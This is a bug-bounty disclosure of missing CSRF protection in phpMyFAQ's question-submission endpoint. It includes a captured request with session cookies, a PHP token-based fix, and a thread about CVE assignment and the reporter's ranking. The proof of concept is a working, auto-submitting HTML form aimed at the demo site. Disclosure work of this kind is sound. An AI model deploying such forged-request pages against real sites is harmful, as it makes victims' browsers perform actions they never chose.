Missing CSRF protection in thorsten/phpmyfaq
Reported on Nov 24th 2022
Description
Any user can add questions in the FAQ section --> https://roy.demo.phpmyfaq.de/index.php?action=ask&category_id=0
The endpoint behind this form is vulnerable to CSRF: the request carries no anti-CSRF token, so an attacker can abuse it without any prior knowledge about the victim. A successful CSRF submits a new question from the victim's browser, under the victim's session.
Captured Request
POST /ajaxservice.php?action=savequestion HTTP/2
Host: roy.demo.phpmyfaq.de
Cookie: PHPSESSID=<ID-VALUE>; pmf_sid=22383; cookieconsent_status=dismiss; phpbb3_6zg4_u=1; phpbb3_6zg4_k=; phpbb3_6zg4_sid=68a52c0cd02a54757d476703488f677a
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 82
Sec-Gpc: 1
Te: trailers
lang=en&name=Demouser&email=demouser%40phpmyfaq.de&category=13&question=Execute-4?
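The captured request shows the gap: the only thing authenticating the POST is the session cookie, which the browser attaches to any cross-site form submission, and nothing in the body or headers ties the request to a page served by the application. The following is an added example of the server-side fix, written for this report and not phpMyFAQ's own code; the field name `csrf`, the session key `csrf_token` and the action name are assumptions chosen to mirror the captured request.

```php
<?php
// Added example (not phpMyFAQ code): per-session CSRF token plus an Origin check
// for a "save question" style endpoint. Field/key names are assumptions.
declare(strict_types=1);

session_start([
    'cookie_httponly' => true,
    'cookie_secure'   => true,
    // Lax stops the cookie riding along on a cross-site top-level POST such as the
    // auto-submitting form in the PoC; the token below remains the primary control.
    'cookie_samesite' => 'Lax',
]);

// Returns the session's CSRF token, creating a 256-bit random one on first use.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token against the session copy.
function csrfValid(?string $submitted): bool
{
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Defence in depth: browsers send Origin (or at least Referer) on cross-site POSTs.
// A missing header is treated as cross-site, because this is a state-changing request.
function sameOrigin(string $expectedHost): bool
{
    $source = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    if ($source === '') {
        return false;
    }
    $host = parse_url($source, PHP_URL_HOST);
    if (!is_string($host)) {
        return false;
    }
    // HTTP_HOST may carry a port; parse_url's host component never does.
    $expected = explode(':', $expectedHost, 2)[0];
    return strcasecmp($host, $expected) === 0;
}

// Handler side (the equivalent of ajaxservice.php?action=savequestion).
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    header('Content-Type: application/json');
    if (!sameOrigin($_SERVER['HTTP_HOST'] ?? '') || !csrfValid($_POST['csrf'] ?? null)) {
        http_response_code(403);
        echo json_encode(['error' => 'invalid or missing CSRF token']);
        exit;
    }
    // ... validate lang/name/email/category/question and store the question here ...
    echo json_encode(['success' => 'question saved']);
    exit;
}

// Form side: embed the token so only a page served by this origin can produce a valid POST.
$token = htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8');
echo <<<HTML
<form method="post" action="ajaxservice.php?action=savequestion">
  <input type="hidden" name="csrf" value="{$token}">
  <input type="hidden" name="lang" value="en">
  <input name="question">
  <button type="submit">Ask</button>
</form>
HTML;
```

Two details from the captured request matter when reviewing a fix like this. The legitimate front end sends the question via XMLHttpRequest with `X-Requested-With: XMLHttpRequest`, but that header is not a CSRF control: a plain HTML form posts without it and the endpoint accepted the request anyway, so the token check must be enforced regardless of how the request arrives. And `SameSite=Lax` alone is not sufficient; it does not cover same-site sub-domains or older clients, which is why the session-bound token remains the check that actually rejects the PoC.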
Proof of Concept
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <!-- same fields as the captured request; no token is required by the endpoint -->
    <form action="https://roy.demo.phpmyfaq.de/ajaxservice.php?action=savequestion" method="POST">
      <input type="hidden" name="lang" value="en" />
      <input type="hidden" name="name" value="Demouser" />
      <input type="hidden" name="email" value="demouser@phpmyfaq.de" />
      <input type="hidden" name="category" value="13" />
      <input type="hidden" name="question" value="Execute-4?" />
      <input type="submit" value="Submit request" />
    </form>
    <!-- submits the form as soon as the page loads in the victim's browser -->
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
PoC Video
Link --> https://drive.google.com/file/d/1uIOoJ-mg17hZutheEbUW3umI1WlU_vLP/view?usp=sharing
Impact
An attacker can submit questions of their choosing, including abusive content, from the browsers of other users, so the entries appear to come from those users' sessions.
Occurrences
index.php L0
(Sorry about this. It was tested on the demo version.)
The CSRF isn't the big issue here, but the stored XSS in the admin section.
If you get its potential, then you can track it as a bug & fix the case
Regards,
Why can't we go for a CVE if it has a potential impact?
Just let me know
@admin
The CSRF bug was there,
but the major was selected by the maintainer, so I received a minor penalty (unfair).
And my credibility decreased to 2.7 even after this discovery. I hope you can do some adjustments and help to boost my label "pro" to "master".
regards,
@admin @maintainer
Yeah, then please assign a CVE for this one: CWE-79: Cross-site Scripting (XSS) - Stored
@Maintainer, can you please do me a favor? The admin is not responding here. Please track a CVE for this bug!
Regards,
@7h3h4ckv157 how can I do that? Never did that before.
@Maintainer I guess you can see that on your UI. Else, let's wait for @admin
Thanks, @admin
But please assist with this 👇🏻
The CSRF bug was there, but the major was selected by the maintainer, so I received a minor penalty (unfair).
And my credibility decreased to 2.7 even after this discovery. I hope you can do some adjustments and help to boost my label "pro" to "master".
@maintainer I appreciate that. But I don't know what's wrong. Now my credibility decreased from 2.7 to 2.6 🙂
@admin Seriously, I've no idea about the backend function!
If the CWE or CVSS are inaccurate, your credibility takes a minor hit. Let's resolve this on chatwoot via Chat with us :)
As requested, this report will now receive a CVE on publication :)
@admin
NIST: NVD Base Score: 5.4 MEDIUM
There's nothing that went wrong on my side. Kindly do something to fix my rank.
Regards,